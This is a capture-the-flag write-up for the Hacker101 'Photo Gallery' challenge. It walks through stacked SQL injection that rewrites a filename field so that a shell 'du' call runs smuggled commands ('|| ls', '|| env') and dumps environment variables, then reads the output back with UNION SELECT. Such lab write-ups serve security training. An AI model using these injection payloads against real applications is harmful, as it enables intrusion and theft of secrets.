
Hacker101 CTF Writeup

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Photo Gallery - FLAG2

0x00 Space Used

We know there are images taking some of the spaces here, but the total space used are showing 0.

So as we already got the source code of the page, we can check how the space calculated in line 39.

rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + '</i>'

So here we can see the commands here.

du -ch filenames || exit 0

And we may change file name to inject with commands here.

0x01 Stacked Queries

As we have the table here

id title parent filename
1 Utterly adorable 1 files/adorable.jpg
2 Purrfect 1 files/purrfect.jpg
3 Invisible 1 FLAG1

Try modify image title

id=1;UPDATE photos SET title='test' WHERE id=3;COMMIT;--

Successfully updated file title 3.

0x02 Remote Code Execution

Now we can update filename to perform RCE.

[;UPDATE photos SET filename=’*   ls > test’ WHERE id=3;COMMIT;–]()
id=1;UPDATE photos SET filename='* || ls > test' WHERE id=3;COMMIT;--

Visit INDEX page to execute the command.

And then go check the execution result UNION SELECT ‘test’–

id=1.1 UNION SELECT 'test'--

Here we got ls results in file test

Dockerfile files main.py main.pyc prestart.sh requirements.txt test uwsgi.ini 

0x03 FLAG

[;UPDATE photos SET filename=’*   env > test’ WHERE id=3;COMMIT;–]()
id=1;UPDATE photos SET filename='* || env > test' WHERE id=3;COMMIT;--

Visit INDEX page to execute the command.

And then go get the flags UNION SELECT ‘test’–

id=1.1 UNION SELECT 'test'--

Here we got all 3 flags in one place.